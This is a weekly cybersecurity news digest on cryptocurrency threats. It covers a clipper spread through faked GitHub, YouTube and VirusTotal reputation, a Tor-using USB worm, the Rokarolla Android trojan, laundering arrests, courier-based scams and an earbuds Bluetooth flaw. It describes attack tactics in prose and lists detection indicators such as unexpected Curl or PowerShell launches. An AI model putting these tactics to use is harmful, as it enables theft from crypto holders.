We’ve compiled the most important cybersecurity news from the past week.

  • A crypto clipper was spread using fake reputations on GitHub and YouTube.
  • A USB worm self-replicated through hidden Windows shortcuts to steal cryptocurrency.
  • South Korean law enforcement dismantled a cryptocurrency laundering network for a Cambodian syndicate.
  • Researchers discovered a new Android trojan designed to steal cryptocurrency.

Crypto Clipper Spread Using Fake Reputation on GitHub and YouTube

An unknown attacker launched a large-scale campaign to distribute malware, employing legitimate marketing techniques to create a fake "reputation economy." This was reported by Check Point Research.

The ultimate goal of the attacks is to implant crypto clippers disguised as trading tools within the Solana and Pump.fun ecosystems, as well as software for predicting betting outcomes.

Phishing page. Source: Check Point Research.

According to experts, the clipper is written in Rust and targets Windows and macOS operating systems. The malware operates stealthily, continuously monitoring the device's clipboard. When it detects a copied cryptocurrency wallet address, it instantly replaces it with the attacker’s details, redirecting digital assets.

To gain the trust of victims—primarily crypto investors and online gamers—the hacker built a complex cross-platform infrastructure of "ghost networks." Analysts observed coordinated activity on VirusTotal: a cluster of fake accounts left positive comments and likes en masse to falsely classify the malicious files as safe.

This manipulation of metrics is also applied on other platforms:

  • GitHub and SourceForge. The attacker manages a network of accounts to mutually promote repositories. On SourceForge, the download counter was artificially inflated to 44,000 using an Android device farm;
  • YouTube. A channel with over 91,000 subscribers is used to advertise the software. Tutorial videos are created using AI voice generators and accompanied by inflated positive comments;
  • Media. To legitimize the tool, the hacker uses press release distribution services (e.g., EIN Presswire), whose publications are then automatically republished by partner news sites.

Check Point researchers emphasized that manipulating crowdsourcing platforms indicates a dangerous shift in social engineering tactics. The successfully tested scheme of cross-platform reputation inflation could be applied in the future for the widespread distribution of ransomware and more sophisticated info stealers.

USB Worm Self-Replicates Through Hidden Windows Shortcuts to Steal Cryptocurrency

Microsoft experts revealed details of a self-replicating malware campaign targeting cryptocurrency owners.

The infection process is triggered when a victim opens a modified shortcut file (.LNK) on a USB drive. Once activated, the worm stealthily installs additional payloads from a command server located in the .onion domain.

The malware scans the local system for user documents. Upon finding them, it hides the originals and replaces them with malicious shortcuts that have identical names. As a result, the malware activates every time the user attempts to open their work files. To self-replicate, the worm creates a scheduled task that monitors ports. As soon as a new USB drive is inserted, the virus instantly copies itself onto the external storage.

Infection scheme. Source: Microsoft.

The stealer only becomes active if the "Task Manager" is not running. It connects to the command server via an embedded Tor executable and monitors the clipboard for sensitive data every half second:

  • 12- and 24-word BIP39 seed phrases;
  • Bitcoin wallet addresses (including Legacy, P2SH, Bech32, and Taproot), Ethereum, Tron, and Monero.

Upon detecting a copied address, the program instantly replaces it with the attacker’s details. To deceive the victim, the algorithm selects wallets whose initial characters visually match the originals.

In addition to clipboard interception, the virus takes five screenshots every ten seconds and sends them to the hackers using the Curl utility. By special command from the server, the software can download and execute arbitrary JavaScript scripts on the infected machine.

The activity of this USB worm has been continuously recorded since at least February. Researchers noted that the most obvious indicators of infection are behavioral rather than signature-based. The main "red flags" of a breach include suspicious background activity from processes wscript.exe and cscript.exe, unexpected launches of Curl, PowerShell, and cmd.exe, as well as unauthorized network connections to localhost:9050 (the standard port for the Tor proxy).

South Korean Law Enforcement Dismantles Cryptocurrency Laundering Network for Cambodian Syndicate

South Korean law enforcement has arrested 23 suspects in a case involving money laundering for a Cambodian phishing organization. This was reported by Newsis.

The scheme was carried out through a complex transaction routing network utilizing both domestic South Korean and foreign cryptocurrency exchanges. According to the investigation, from February 2024 to April 2025, the group moved approximately 11.1 million USDT.

The police highlighted the colossal scale of the infrastructure involved: the criminals used around 11,300 different accounts for money laundering. These transit accounts were directly linked to stolen funds totaling approximately $17 million, which the criminals obtained from 265 incidents.

During police raids, criminal proceeds amounting to 650 million won (about $430,000) were seized. However, the active phase of the operation is not yet complete: the alleged leader of the group remains at large. An Interpol "red notice" has already been issued for him, indicating an international search and extradition.

Researchers Discover New Android Trojan for Stealing Cryptocurrency

Security researchers at Zimperium discovered a Trojan for Android aimed at stealing cryptocurrency.

According to analysts, the Rokarolla malware arsenal includes 137 remote commands. The toolkit allows for intercepting PIN codes, reading and sending SMS, manipulating the clipboard to steal digital assets, and forcibly disabling built-in OS protection mechanisms.

The software spreads through malicious websites masquerading as installers for popular services like TikTok and Google Chrome.

In the first stage, the victim downloads a program that visually mimics a system component of Google Play Protect. Using this disguise, the dropper employs social engineering to compel the user to grant access to "Special Features." Once permission is obtained, the malware deploys its main payload and immediately disables the real Play Protect scanner.

Permission request by the Rokarolla Trojan. Source: Zimperium.

Rokarolla downloads fake HTML login pages for each active application from its server. When the victim opens a legitimate crypto wallet, the Trojan instantly overlays it with a fake window and intercepts all entered credentials.

Additionally, a separate overlay precisely mimics the standard Android lock screen. This allows the malware to steal the PIN code, password, or graphical key, giving operators the ability to control the smartphone even when it is locked. To steal cryptocurrency, the Trojan employs an embedded clipper: it stealthily monitors the clipboard and replaces copied wallet addresses with the attackers’ details, redirecting transactions.

To bypass two-factor authentication, Rokarolla reads all SMS on the device and can send messages on its own, intercepting one-time banking codes. Furthermore, by designating itself as the default app for calls and SMS, the Trojan can block incoming calls—thus, a warning call from the bank's anti-fraud system simply won’t reach the owner.

Experts emphasized that the main defense against such threats is heightened vigilance when granting permissions to "Special Features," as these trigger the entire attack chain.

Cryptoscammers Hired Couriers to Collect Cash

Criminals have started hiring couriers to collect funds from victims whose transactions are blocked by banking security systems. This new tactic by operators of cryptocurrency "pig butchering" schemes was reported by the FBI.

Typically, such scams begin with fraudsters contacting potential victims through social media, dating sites, and messaging apps, gaining their trust, and then luring them into fake investment schemes.

Once convinced to withdraw cash (for example, under the pretext of a temporary "freeze" on their account), the scammers send a courier to the trusting individual. A pre-agreed password or the serial number of a specific dollar bill is used for identification. After receiving the money, the hackers simulate an increase in the victim's virtual wallet balance and restart the cycle, demanding new contributions to pay fictitious "taxes" on withdrawals.

According to FBI data for 2025, cryptocurrency and investment scams remain the "most destructive form" of cybercrime in the U.S., accounting for 49% of all incidents with a total loss of $8.6 billion.

Vulnerability in Wireless Earbuds Allowed Hackers to Eavesdrop on iPhone Users

Apple released a firmware update for the Beats Studio Buds wireless earbuds, addressing a high-severity vulnerability.

The flaw, reported by SentinelOne back in January, allowed attackers to secretly connect to the device and use the built-in microphone for eavesdropping.

The issue, identified as CVE-2025-20701, is related to improper authorization in the Bluetooth audio SDK from chip developer Airoha. The defect allows a hacker within Bluetooth range to remotely connect their equipment to the earbuds without the user’s knowledge or consent, provided the headset is not yet paired and is actively searching for connections. The vulnerability has been successfully patched in the Beats firmware update version 1B211.

Experts noted that the exploit can be activated via standard Bluetooth or low-energy Bluetooth (BLE) protocols without any authentication. In addition to eavesdropping, the attack gives hackers nearly complete control over the device: it allows reading and rewriting the earbuds' RAM and flash memory. Moreover, hackers can intercept established trust relationships with previously paired smartphones, opening a vector for more complex multi-stage attacks.

Also on ForkLog:

  • An outdated contract on the Aztec network was hacked for $2 million.
  • Kentucky, following other states, has filed a lawsuit against Polymarket.
  • The UK will ban social media for children under 16.
  • The Supreme Court of Russia recognized cryptocurrency as a subject of theft.
  • Bitbank threatened to block transactions related to Polymarket.

What to Read This Weekend?

Ideas that change the world often emerge from the periphery—from people whom contemporaries consider oddballs. In a new piece, ForkLog explores why pioneers like Jack Parsons often remain in the shadows of the revolutions they have created.